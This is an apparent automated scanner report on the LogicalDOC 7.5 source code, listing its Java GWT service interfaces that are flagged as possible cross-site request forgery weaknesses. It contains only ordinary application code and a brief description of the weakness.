Post on 12-Aug-2020


Page 1: Report on found vulnerabilities - InfoWatch...4 The report on detected vulnerabilities FILES Java: Defending against Cross-site Request Forgery using GWT Severity: high Language: Java

Report on found vulnerabilities

Reporting period: 07.07.2016 - 08.07.2016
Scanned files: 3579
Files by language:
  Java 1020
  JavaScript 37
  Transact-SQL 8


2 The report on detected vulnerabilities FILES

File name: logicaldoc-7.5-src.zip (MD5: b9ef2a8605d1af408d034fee712abc8a)
Files: 3579
Lines: 282948
Vulnerabilities by severity: High = 111, Medium = 7, Low = 61


2 The report on detected vulnerabilities CHARTS


Java: Defending against Cross-site Request Forgery using GWT
Severity: high
Language: Java
Short description: HTTP has no standard mechanism for verifying that a request was sent intentionally by the user. An attacker can therefore cause the user's browser to send a request to a given server without the user's knowledge.
Full description: https://localhost:443/scanner/article?articleName=/en/Java/GwtCsrf.html

Found Vulnerabilities:

File name: logicaldoc/logicaldoc-dropbox/src/main/java/com/logicaldoc/dropbox/DropboxServiceImpl.java
Code:

 * Implementation of the DropboxService
 * 
 * @author Marco Meschieri - Logical Objects
 * @since 7.0
 */
public class DropboxServiceImpl extends RemoteServiceServlet implements DropboxService {
    private static final long serialVersionUID = 1L;

    private static Logger log = LoggerFactory.getLogger(DropboxServiceImpl.class);

    @Override
    public boolean isConnected() throws ServerException {
        Session session = SessionUtil.validateSession(getThreadLocalRequest());

        try {
            Dropbox dbox = new Dropbox();
            String accessToken = loadAccessToken(session.getUser());
            if (accessToken == null)
                return false;
            return dbox.login(accessToken, session.getUser().getLocale());
        } catch (Throwable t) {
            log.error(t.getMessage(), t);
            throw new RuntimeException(t.getMessage(), t);
        }
    }

    @Override
    public String startAuthorization() throws ServerException {
        Session session = SessionUtil.validateSession(getThreadLocalRequest());

        try {
            Dropbox dbox = new Dropbox();
            return dbox.startAuthorization(session.getUser().getLocale());
        } catch (Throwable t) {
            log.error(t.getMessage(), t);
            throw new RuntimeException(t.getMessage(), t);
        }
    }

    @Override
    public String finishAuthorization(String authorizationCode) throws ServerException {
        Session session = SessionUtil.validateSession(getThreadLocalRequest());

        try {
            User user = session.getUser();
            Dropbox dbox = new Dropbox();
            String token = dbox.finishAuthorization(authorizationCode, user.getLocale());
            if (token == null)
                return null;
...


File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/common/client/services/InfoService.java
Code:

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.0.0
 */
@RemoteServiceRelativePath("info")
public interface InfoService extends RemoteService {
    /**
     * Retrieves the system informations
     */
    public GUIInfo getInfo(String locale, String tenant);

    public GUIParameter[] getSessionInfo() throws InvalidSessionException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/common/client/services/SecurityService.java
Code:

/**
 * The client side stub for the Security Service. This service gives all needed
 * methods to handle user sessions.
 */
@RemoteServiceRelativePath("security")
public interface SecurityService extends RemoteService {
    /**
     * Logs-in a user by an existing session ID (session reuse)
     *
     */
    public GUISession getSession(String locale);

    /**
     * Changes the password of a user
     * 
     * @param userId The user Identifier
     * @param oldPassword can be null
     * @param newPassword
     * @param notify If the new credentials need to be notified
     * @return 0 if all is ok, 1 if the password is incorrect, 2 if the new
     *         password cannot be notified, otherwise a positive number grater
     *         than 2
     */
    public int changePassword(long userId, String oldPassword, String newPassword, boolean notify);

    /**
     * Logs out the current user
     */
    public void logout();

    /**
     * Deletes a given user
     */
    public void deleteUser(long userId) throws ServerException;

    /**
     * Creates or updates a user
     */
    public GUIUser saveUser(GUIUser user, GUIInfo info) throws ServerException;

    /**
     * Saves the profile data only


     */
    public GUIUser saveProfile(GUIUser user) throws ServerException;

    /**
     * Loads a given user from the database
     */
    public GUIUser getUser(long userId) throws ServerException;
...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/AnnotationsService.java
Code:

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 7.2
 */
@RemoteServiceRelativePath("annotations")
public interface AnnotationsService extends RemoteService {

    /**
     * Prepares the system to accept annotations for the given document
     * 
     * @param docId The document to elaborate
     * @param fileVersion Optional file version specification
     * @return The number of document's pages
     * @throws ServerException
     */
    public int prepareAnnotations(long docId, String fileVersion) throws ServerException;

    /**
     * Adds a new annotation in the given page
     * 
     * @param docId The document identifier
     * @param page The current page
     * @param snippet A snippet of the selected text
     * @param text The annotation's text
     * 
     * @return The new annotation's ID
     * @throws ServerException
     */
    public long addAnnotation(long docId, int page, String snippet, String text) throws ServerException;

    /**
     * Saves the page with annotations
     * 
     * @param docId The document identifier
     * @param page The current page
     * @param content The page's content
     * 
     * @throws ServerException
     */
    public void savePage(long docId, int page, String content) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/AttributeSetService.java
Code:

/**
 * The client side stub for the AttributeSet Service. This service gives all
 * needed methods to handle attribute sets.
 */
@RemoteServiceRelativePath("attributeset")
public interface AttributeSetService extends RemoteService {


    /**
     * Deletes a given set
     */
    public void delete(long setId) throws ServerException;

    /**
     * Creates or updates a set
     */
    public GUIAttributeSet save(GUIAttributeSet set) throws ServerException;

    /**
     * Loads a given set from the database
     */
    public GUIAttributeSet getAttributeSet(long setId) throws ServerException;

    /**
     * Saves the list of all possible options
     */
    public void saveOptions(long setId, String attribute, String[] values) throws ServerException;

    /**
     * Delete a selection of options
     */
    public void deleteOptions(long setId, String attribute, String[] values) throws ServerException;

    /**
     * Reads the contacts that are about to be imported from CSV
     */
    public String[] parseOptions(long setId, String attribute) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/BarcodeService.java
Code:

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.1
 */
@RemoteServiceRelativePath("barcode")
public interface BarcodeService extends RemoteService {
    /**
     * Loads a bean that contains all engine infos.
     */
    public GUIBarcodeEngine getInfo() throws ServerException;

    /**
     * Saves the engine settings
     */
    public void save(GUIBarcodeEngine engine) throws ServerException;

    /**
     * Reschedule all documents for processing
     */
    public void rescheduleAll() throws ServerException;

    /**
     * Marks a set of documents as not processable.
     */
    public void markUnprocessable(long[] ids) throws ServerException;

    /**
     * Loads the patterns configured for a given template.
     */
    public GUIBarcodePattern[] loadPatterns(Long templateId) throws ServerException;


    /**
     * Saves the patterns for the given template ordered by position
     */
    public void savePatterns(String[] patterns, Long templateId) throws ServerException;

}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/CalendarService.java
Code:

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.7
 */
@RemoteServiceRelativePath("calendar")
public interface CalendarService extends RemoteService {

    /**
     * Saves an event
     */
    public void saveEvent(GUICalendarEvent event) throws ServerException;

    /**
     * Gets an event
     */
    public GUICalendarEvent getEvent(long eventId) throws ServerException;

    /**
     * Searches for events.
     * 
     * @param startDate Start date (optional)
     * @param endDate End date (optional)
     * @param expireFrom (optional)
     * @param expireTo (optional)
     * @param frequency The frequency of the event (1,15, 30 ... optional)
     * @param title The title (used with like operator, optional)
     * @param type The type (used with like operator, optional)
     * @param subtype The subtype (used with like operator, optional)
     * @param status The title (used with like operator, optional)
     * @param maxRecords Maximum number of records (optional)
     * 
     * @return The list of events ordered by ascending date
     */
    public GUICalendarEvent[] find(Date startDate, Date endDate, Date expireFrom, Date expireTo,
            Integer frequency, String title, String type, String subtype, Integer status, Integer maxRecords) throws ServerException;

    /**
     * Deletes an event. If the event is a master, in any case all the
     * occurrences will be deleted too.
     */
    public void deleteEvent(long eventId) throws ServerException;

    /**
     * Counts the number of events that start from now until a given date.
     * 
     * @param username The user to be processed
     * @param end The and date
     * @return The number of found events
     * 
...


File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/ContactService.java
Code:

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.0
 */
@RemoteServiceRelativePath("contact")
public interface ContactService extends RemoteService {
    /**
     * Deletes a selection of contacts
     */
    public void delete(long[] ids) throws ServerException;

    /**
     * Saves a contact in the database
     */
    public void save(GUIContact contact) throws ServerException;

    /**
     * Loads a contact from the database
     */
    public GUIContact load(long id) throws ServerException;

    /**
     * Reads the contacts that are about to be imported from CSV file
     */
    public GUIContact[] parseContacts(boolean preview, String separator, String delimiter,
            boolean skipFirstRow, int firstName, int lastName, int email, int company, int phone, int mobile,
            int address) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/CustomIdService.java
Code:

/**
 * The client side stub for the CustomIdService Service. This service gives all
 * needed methods to handle custom ids configutations.
 */
@RemoteServiceRelativePath("customid")
public interface CustomIdService extends RemoteService {
    /**
     * Deletes a given configuration
     */
    public void delete(long templateId, String type) throws ServerException;

    /**
     * Creates or updates a configuration
     */
    public void save(GUICustomId customid) throws ServerException;

    /**
     * Loads a given configuration from the database
     */
    public GUICustomId get(long templateId, String type) throws ServerException;

    /**
     * Load all CustomIds rules
     */
    public GUICustomId[] load() throws ServerException;

    /**
     * Reset the numbering of a given sequence
     */
    public void resetSequence(long sequenceId, long value) throws ServerException;



    /**
     * Loads the list of sequences
     */
    public GUISequence[] loadSequences() throws ServerException;

    /**
     * Deletes the given sequence
     */
    public void deleteSequence(long sequenceId) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/DocumentService.java
Code:

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.0
 */
@RemoteServiceRelativePath("document")
public interface DocumentService extends RemoteService {
    /**
     * Retrieves a specific document by its ID
     */
    public GUIDocument getById(long docId) throws ServerException;

    /**
     * Saves the document in the DB
     * 
     * @param document The document to save
     * @return The saved document
     */
    public GUIDocument save(GUIDocument document) throws Exception;

    /**
     * Retrieves all attributes of the specified template
     */
    public GUIAttribute[] getAttributes(long templateId) throws ServerException;

    /**
     * Retrieves two specific versions by its ID
     */
    public GUIVersion[] getVersionsById(long id1, long id2) throws ServerException;

    /**
     * Sends a document as email(attachment or download ticket)
     * 
     * @return "ok" otherwise an error code
     */
    public String sendAsEmail(GUIEmail email, String locale) throws ServerException;

    /**
     * Updates the links type
     * 
     * @param id The link identifier
     * @param type The new type to be set
     */
    public void updateLink(long id, String type) throws ServerException;

    /**
     * Deletes a selection of links
     */
    public void deleteLinks(long[] ids) throws ServerException;

...


File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/DropboxService.java
Code:

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 7.0
 */
@RemoteServiceRelativePath("dropbox")
public interface DropboxService extends RemoteService {
    /**
     * Checks if the user has connected the LogicalDOC application to his
     * Dropbox account.
     */
    public boolean isConnected() throws ServerException;

    /**
     * Starts the authorization process and returns the Dropbox authorization
     * page URL to be shown to the user.
     */
    public String startAuthorization() throws ServerException;

    /**
     * Ends the authorization code and saves the access token in the database.
     */
    public String finishAuthorization(String authorizationCode) throws ServerException;

    /**
     * Exports documents and folders into Dropbox
     * 
     * @param sid The session ID
     * @param targetPath the target path in Dropbox (must be a folder)
     * @param folderIds Ids of the folders to be imported (all subfolders and
     *        docs will be imported as well
     * @param docIds Ids of the documents to be imported
     * @return
     * @throws ServerException
     */
    public boolean exportDocuments(String targetPath, long[] folderIds, long[] docIds)
            throws ServerException;
    
    public int importDocuments(long targetFolder, String[] paths)
            throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/EmailAccountService.java
Code:

/**
 * The client side stub for the EmailAccount Service. This service gives all
 * needed methods to handle templates.
 */
@RemoteServiceRelativePath("emailaccount")
public interface EmailAccountService extends RemoteService {
    /**
     * Deletes a given account
     */
    public void delete(long id) throws ServerException;

    /**
     * Creates or updates an account
     */
    public GUIEmailAccount save(GUIEmailAccount account) throws ServerException;

    /**


     * Loads a given account from the database
     */
    public GUIEmailAccount get(long id) throws ServerException;

    /**
     * Test the connection to the given account
     */
    public boolean test(long id) throws ServerException;

    /**
     * Changes an account enabled/disabled status
     */
    public void changeStatus(long id, boolean enabled) throws ServerException;

    /**
     * Cleans the cache
     */
    public void resetCache(long id) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/FolderService.java
Code:

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.0
 */
@RemoteServiceRelativePath("folder")
public interface FolderService extends RemoteService {
    /**
     * Saves the folder in the DB
     * 
     * @param folder The folder to save
     * @return The saved folder
     */
    public GUIFolder save(GUIFolder folder) throws ServerException;

    /**
     * Creates a new folder
     * 
     * @param newFolder The folder to be created
     * @param inheritSecurity True if the new folder has to inherit the security
     *        policies from the parent
     * @return The saved folder
     */
    public GUIFolder create(GUIFolder newFolder, boolean inheritSecurity) throws ServerException;

    /**
     * Creates a new folder alias
     * 
     * @param parentId The folder in which the alias must be created
     * @param foldRef The original folder
     * @return The created alias
     */
    public GUIFolder createAlias(long parentId, long foldRef) throws ServerException;

    /**
     * Renames the given folder
     */
    public void rename(long folderId, String name) throws ServerException;

    /**
     * Applies all security settings to folder
     * 
     * @param folder The folder that contains the new security settings
     * @param subfolders If true, the current security settings will be applied


     *        to the sub-folders
     */
    public void applyRights(GUIFolder folder, boolean subfolders) throws ServerException;

    /**
     * Inherits the rights of another folder
...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/FormService.java
Code:

/**
 * The client side stub for the Form Service. This service gives all needed
 * methods to handle the forms.
 */
@RemoteServiceRelativePath("form")
public interface FormService extends RemoteService {
    /**
     * Creates a new form
     */
    public GUIDocument create(GUIDocument form) throws ServerException;

    /**
     * Creates a form
     */
    public void delete(long formId) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/GDriveService.java
Code:

 * 
 * @author Marco Meschieri - LogicalDOC
 * @since 7.3
 */
@RemoteServiceRelativePath("gdrive")
public interface GDriveService extends RemoteService {

    /**
     * Uploads a document to Google Drive.
     * 
     * @param docId ID of the document to upload
     * 
     * @returns The resourceId of the uploaded document
     */
    public String upload(long docId) throws ServerException;

    /**
     * Deletes a document in Google Drive.
     * 
     * @param docId ID of the document to delete
     */
    public void delete(String resourceId) throws ServerException;

    /**
     * Performs the check-in of a Google Drives's document into the LogicalDOC
     * repository.
     * 
     * @param docId ID of the document to update
     * @param comment The comment left for the checkin
     * @param major If this is a major or minor release
     * 
     * @return The checked-in document
     */


    public GUIDocument checkin(long docId, String comment, boolean major) throws ServerException;

    /**
     * Imports some Google documents into LogicalDOC
     * 
     * @param resourceIds IDS of the documents to import
     * @param targetFolderId ID of the import folder
     * @param format The type of the documents
     */
    public void importDocuments(String[] resourceIds, long targetFolderId, String format)
            throws ServerException;

    /**
     * Exports a selection of documents from LogicalDOC into GoogleDocs
     * 
     * @param ids The ids of the document to be exported
...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/ImpexService.java
Code:

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.0
 */
@RemoteServiceRelativePath("impex")
public interface ImpexService extends RemoteService {
    /**
     * Deletes a specific archive by its ID
     */
    public void delete(long archiveId) throws ServerException;

    /**
     * Deletes a set of versions from the given archive
     */
    public GUIArchive deleteVersions(long archiveId, Long versionIds[]) throws ServerException;

    /**
     * Change the status of the given Archive
     */
    public void setStatus(long archiveId, int status) throws ServerException;

    /**
     * Saves/Updates a given archive
     */
    public GUIArchive save(GUIArchive archive) throws ServerException;

    /**
     * Loads a given archive
     */
    public GUIArchive load(long archiveId) throws ServerException;

    /**
     * Adds a set of documents(their current versions) to the given archive
     */
    public void addDocuments(long archiveId, long[] documentIds) throws ServerException;

    /**
     * Adds a a folder(the current version of the contained documents at any level).
     */
    public void addFolder(long archiveId, long rootId) throws ServerException;
    
    /**
     * Deletes a given incremental configuration
     */


    public void deleteIncremental(long id) throws ServerException;

    /**
     * Loads an incremental configuration
     */
...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/ImportFolderService.java
Code:

/**
 * The client side stub for the ImportFolder Service. This service gives all
 * needed methods to handle import folders.
 */
@RemoteServiceRelativePath("importfolder")
public interface ImportFolderService extends RemoteService {
    /**
     * Deletes a given folder
     */
    public void delete(long id) throws ServerException;

    /**
     * Creates or updates an import folder
     */
    public GUIImportFolder save(GUIImportFolder share) throws ServerException;

    /**
     * Loads a given import folder from the database
     */
    public GUIImportFolder getImportFolder(long id) throws ServerException;

    /**
     * Test the connection to the given import folder
     */
    public boolean test(long id) throws ServerException;

    /**
     * Changes a importFolder enabled/disabled status
     */
    public void changeStatus(long id, boolean enabled) throws ServerException;

    /**
     * Cleans the cache
     */
    public void resetCache(long id) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/LdapService.java
Code:


/**
 * The client side stub for the LdapService.
 */
@RemoteServiceRelativePath("ldap")
public interface LdapService extends RemoteService {
    /**
     * Saves external authentication settings
     */
    public void saveSettings(GUILdapSettings ldapSettings) throws ServerException;

    /**
     * Tests the connection
     */


    public boolean testConnection(GUILdapSettings ldapSettings) throws ServerException;

    /**
     * Loads external authentication settings
     */
    public GUILdapSettings loadSettings() throws ServerException;

    /**
     * Search for users in the LDAP repository
     * 
     * @login used with LIKE operator to restrict the search
     */
    public GUIUser[] listUsers(String login) throws ServerException;

    /**
     * Imports a selection of users
     * 
     * @param sid The session identifier
     * @param usernames The list of usernames to import
     * @param tenantId Tenant the users need to be imported in
     * 
     * @return Number of imports, updates, errors.
     */
    public GUIValue[] importUsers(String[] usernames, long tenantId) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/MessageService.java
Code:

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.0
 */
@RemoteServiceRelativePath("message")
public interface MessageService extends RemoteService {

    /**
     * Gets the Message
     */
    public GUIMessage getMessage(long messageId, boolean markAsRead) throws ServerException;

    /**
     * Deletes a list of Messages
     */
    public void delete(long[] ids) throws ServerException;

    void save(GUIMessage message, long[] recipientIds) throws ServerException;

    /**
     * Loads the templates configured for a given language.
     */
    public GUIMessageTemplate[] loadTemplates(String language) throws ServerException;

    /**
     * Saves the given templates
     */
    public void saveTemplates(GUIMessageTemplate[] templates) throws ServerException;

    /**
     * Deletes a selection of templates
     */
    public void deleteTemplates(long[] ids) throws ServerException;
}


File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/ReportService.java
Code:

/**
 * The client side stub for the Report Service. This service gives all needed
 * methods to handle reports.
 */
@RemoteServiceRelativePath("report")
public interface ReportService extends RemoteService {
    /**
     * Deletes a given report
     */
    public void delete(long id) throws ServerException;

    /**
     * Updates a report
     */
    public GUIReport save(GUIReport report) throws ServerException;

    /**
     * Store the uploaded design file in the given report
     */
    public void storeUploadedDesign(long id) throws ServerException;

    /**
     * Creates a new report
     */
    public GUIReport create(GUIReport report) throws ServerException;

    /**
     * Loads a given report from the database
     */
    public GUIReport getReport(long id, boolean withLog) throws ServerException;

    /**
     * Loads all the reports
     */
    public GUIReport[] getReports() throws ServerException;

    /**
     * Loads the attributes defined in the given report
     */
    public GUIAttribute[] getReportParameters(long id) throws ServerException;

    /**
     * Changes a report enabled/disabled status
     */
    public void changeStatus(long id, boolean enabled) throws ServerException;

    /**
     * Processes a report
     */
...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/RetentionPoliciesService.java
Code:

/**
 * The client side stub for the RetentionPolicies Service. This service gives
 * all needed methods to handle the retention policies.
 */
@RemoteServiceRelativePath("retentionpolicies")
public interface RetentionPoliciesService extends RemoteService {
    /**

Page 18: Report on found vulnerabilities - InfoWatch...4 The report on detected vulnerabilities FILES Java: Defending against Cross-site Request Forgery using GWT Severity: high Language: Java

18 The report on detected vulnerabilities FILES

15     * Deletes a given policy16     */17    public void delete(long id) throws ServerException;1819    /**20     * Creates or updates a retention policy21     */22    public GUIRetentionPolicy save(GUIRetentionPolicy policy) throws ServerException;2324    /**25     * Loads a given policy from the database26     */27    public GUIRetentionPolicy getPolicy(long id) throws ServerException;2829    /**30     * Reorder the policies31     */32    public void reorder(long[] ids) throws ServerException;33    34    /**35     * Changes a policy enabled/disabled status36     */37    public void changeStatus(long id, boolean enabled) throws ServerException;3839}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/SearchEngineService.java
Code (from line 10):

 * 
 * @author Matteo Caruso - Logical Objects
 * @since 6.0
 */
@RemoteServiceRelativePath("searchengine")
public interface SearchEngineService extends RemoteService {
    /**
     * Loads a search engine that contains all search engine infos.
     */
    public GUISearchEngine getInfo() throws ServerException;

    /**
     * Unlocks the indexer.
     */
    public void unlocks() throws ServerException;

    /**
     * Checks the indexer.
     */
    public String check() throws ServerException;

    /**
     * Reschedule all entries for indexing.
     */
    public void rescheduleAll(boolean dropIndex) throws ServerException;

    /**
     * Saves search engine settings
     */
    public void save(GUISearchEngine searchEngine) throws ServerException;

    /**
     * Changes the activation status of a language
     */
    public void setLanguageStatus(String language, boolean active) throws ServerException;

    /**
     * Sets the parser aliases for the given extension. Aliases must be a
     * comma-separated values.
     */
    public void setAliases(String extension, String aliases) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/SearchService.java
Code (from line 11):

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.0
 */
@RemoteServiceRelativePath("search")
public interface SearchService extends RemoteService {

    /**
     * Performs a search against the database
     * 
     * @param sid The current user session
     * @param options The search options
     * @return Result hits and statistics
     */
    public GUIResult search(GUISearchOptions options) throws ServerException;

    /**
     * Saves the search options in the user's working dir
     * 
     * @param sid The current user session
     * @param options The search options
     * @return true if the operation was successful and there were no duplicates
     */
    public boolean save(GUISearchOptions options) throws ServerException;

    /**
     * Deletes a previously saved search
     * 
     * @param sid The current user session
     * @param names The saved search names
     */
    public void delete(String[] names) throws ServerException;

    /**
     * Loads a saved search
     * 
     * @param sid The current user session
     * @param name The saved search name
     * @return
     */
    public GUISearchOptions load(String name) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/SettingService.java
Code (from line 13):

 * 
 * @author Matteo Caruso - Logical Objects
 * @since 6.0
 */
@RemoteServiceRelativePath("setting")
public interface SettingService extends RemoteService {

    /**
     * Loads web services, webDav and other client-related settings
     */
    public GUIParameter[] loadClientSettings() throws ServerException;

    /**
     * Loads the complete settings set
     */
    public GUIParameter[] loadSettings()throws ServerException;

    /**
     * Loads a set of settings values
     * 
     * @param sid The current session identifier
     * @param names The setting names to be retrieved
     * @return The array of settings
     * @throws ServerException
     */
    public GUIParameter[] loadSettingsByNames(String[] names) throws ServerException;

    /**
     * Saves settings
     */
    public void saveSettings(GUIParameter[] settings) throws ServerException;

    /**
     * Loads email settings (SMTP connection)
     */
    public GUIEmailSettings loadEmailSettings()throws ServerException;

    /**
     * Tests the SMTP connection
     * 
     * @param sid The session identifier
     * @param email email address to test(it will receive a test message)
     * @return True only if the email was sent
     */
    public boolean testEmail(String email) throws ServerException;

    /**
     * Load the repositories paths.
     * 
...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/ShareFileService.java
Code (from line 9):

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 7.2.1
 */
@RemoteServiceRelativePath("sharefile")
public interface ShareFileService extends RemoteService {
    /**
     * Exports documents and folders into ShareFille
     * 
     * @param targetFolder the target folder in ShareFile
     * @param folderIds Ids of the folders to be imported (all subfolders and
     *        docs will be imported as well
     * @param docIds Ids of the documents to be imported
     * @return
     * @throws ServerException
     */
    public boolean exportDocuments(String targetFolder, long[] folderIds, long[] docIds)
            throws ServerException;

    public int importDocuments(long targetFolder, String[] itemIds) throws ServerException;

    /**
     * Save the settings used by the FileShare module
     * 
     * @param hostname
     * @param username
     * @param password
     * @throws ServerException
     */
    public void saveSettings(String hostname, String username, String password) throws ServerException;

    /**
     * Retrieve the settings saved for connecting to FileShare.
     */
    public String[] loadSettings() throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/SignService.java
Code (from line 10):

 * 
 * @author Matteo Caruso - Logical Objects
 * @since 6.1
 */
@RemoteServiceRelativePath("sign")
public interface SignService extends RemoteService {
    /**
     * Extracts the certificate subjects names from an uploaded .pem certificate
     * or .p7m file .
     * 
     * @param docId Id of signed document to verify (optional)
     * @param fileVersion The file version of the document to verify (optional)
     * @return Subjects names array.
     * @throws ServerException
     */
    public String[] extractSubjectSignatures(Long docId, String fileVersion) throws ServerException;

    /**
     * Stores the user's certificate file associated to the given signer name.
     * 
     * @return 'ok' if no errors occurred, otherwise returns the error message.
     * @throws ServerException
     */
    public String storeSignature() throws ServerException;

    /**
     * Signs the given documents
     * 
     * @param docIds The documents to be signed
     * @return 'ok' if no errors occurred, otherwise returns the error message.
     * @throws ServerException
     */
    public String signDocuments(long[] docIds) throws ServerException;

    /**
     * Verifies the user signature file, checks if the uploaded file's digest
     * and the document's file digest are equals, then signs the document.
     * 
     * @param docId Identifier of the document to sign
     * @return 'ok' if no errors occurred, otherwise returns the error message.
     * @throws ServerException
     */
    public String storeSignedDocument(long docId) throws ServerException;

    /**
     * Stores the private key of the given user
     * 
     * @param userid Identifier of the user that is saving the signature
     * @param keyPassword The password to open the key (it the user uploads an
...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/StampService.java
Code (from line 8):

/**
 * The client side stub for the Stamp Service. This service gives all needed
 * methods to handle the stamps.
 */
@RemoteServiceRelativePath("stamp")
public interface StampService extends RemoteService {
    /**
     * Deletes a given stamp
     */
    public void delete(long id) throws ServerException;

    /**
     * Creates or updates a stamp
     */
    public GUIStamp save(GUIStamp stamp) throws ServerException;

    /**
     * Saves the stamp's image
     */
    public void saveImage(long stampId) throws ServerException;

    /**
     * Loads a given stamp from the database
     */
    public GUIStamp getStamp(long id) throws ServerException;

    /**
     * Changes a stamp enabled/disabled status
     */
    public void changeStatus(long id, boolean enabled) throws ServerException;

    /**
     * Applies a stamp to the given document
     */
    public void applyStamp(long[] docIds, long stampId) throws ServerException;

    /**
     * Remove users from stamp
     */
    public void removeUsers(long[] userIds, long stampId) throws ServerException;

    /**
     * Assigns users to stamp
     */
    public void addUsers(long[] userIds, long stampId) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/SystemService.java
Code (from line 16):

 * 
 * @author Matteo Caruso - Logical Objects
 * @since 6.0
 */
@RemoteServiceRelativePath("system")
public interface SystemService extends RemoteService {

    /**
     * Retrieves all the statistics parameters.
     * 
     * <ol>
     * <li>The first array is the Repository statistics.</li>
     * <li>The second array is the Documents statistics.</li>
     * <li>The third array is the Folders statistics.</li>
     * <li>The fourth array contains the last run date.</li>
     * </ol>
     * 
     * @param sid The current user session
     * @param locale The current user locale
     */
    public GUIParameter[][] getStatistics(String locale) throws ServerException;

    /**
     * Performs a search over the last changes.
     * 
     * @param sid The current user session
     * @param username The user name that must be associated to the history
     * @param from The starting date to search the histories
     * @param till The ending date to search the histories
     * @param maxResult The maximum number of history results
     * @param historySid The history session identifier
     * @param event The history events
     * @return Result hits and statistics
     */
    public GUIHistory[] search(String userName, Date from, Date till, int maxResult, String historySid,
            String[] event) throws ServerException;

    /**
     * Retrieves all tasks.
     * 
     * @param sid The current user session
     * @param locale The current user locale
     */
    public GUITask[] loadTasks(String locale) throws ServerException;

    /**
     * Starts the task execution.
     * 
     * @param taskName The task name
...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/TagService.java
Code (from line 11):

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.0
 */
@RemoteServiceRelativePath("tag")
public interface TagService extends RemoteService {

    /**
     * Loads the tag cloud from the server
     */
    public GUITag[] getTagCloud() throws ServerException;

    /**
     * Deletes an existing tag
     */
    public void delete(String tag) throws ServerException;

    /**
     * Rename an existing tag to another label
     */
    public void rename(String tag, String newTag) throws ServerException;

    /**
     * Adds a new tag in the list of available tags.
     */
    public void addTag(String tag) throws ServerException;

    /**
     * Removes an available from the list of available tags.
     */
    public void removeTag(String tag) throws ServerException;

    /**
     * Gets the tag settings
     */
    public GUIParameter[] getSettings() throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/TemplateService.java
Code (from line 8):

/**
 * The client side stub for the Template Service. This service gives all needed
 * methods to handle templates.
 */
@RemoteServiceRelativePath("template")
public interface TemplateService extends RemoteService {
    /**
     * Deletes a given template
     */
    public void delete(long templateId) throws ServerException;

    /**
     * Creates or updates a template
     */
    public GUITemplate save(GUITemplate template) throws ServerException;

    /**
     * Loads a given template from the database
     */
    public GUITemplate getTemplate(long templateId) throws ServerException;
}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/TenantService.java
Code (from line 11):

 * 
 * @author Marco Meschieri - Logical Objects
 * @since 6.9
 */
@RemoteServiceRelativePath("tenant")
public interface TenantService extends RemoteService {
    /**
     * Deletes a specific tenant by its ID
     */
    public void delete(long tenantId) throws ServerException;

    /**
     * Saves/Updates a given tenant
     */
    public GUITenant save(GUITenant tenant) throws ServerException;

    /**
     * Loads a given tenant
     */
    public GUITenant load(long tenantId) throws ServerException;

    /**
     * Changes the password of the administrator of the given tenant
     */
    public void changeAdminPassword(String password, String tenantName) throws ServerException;

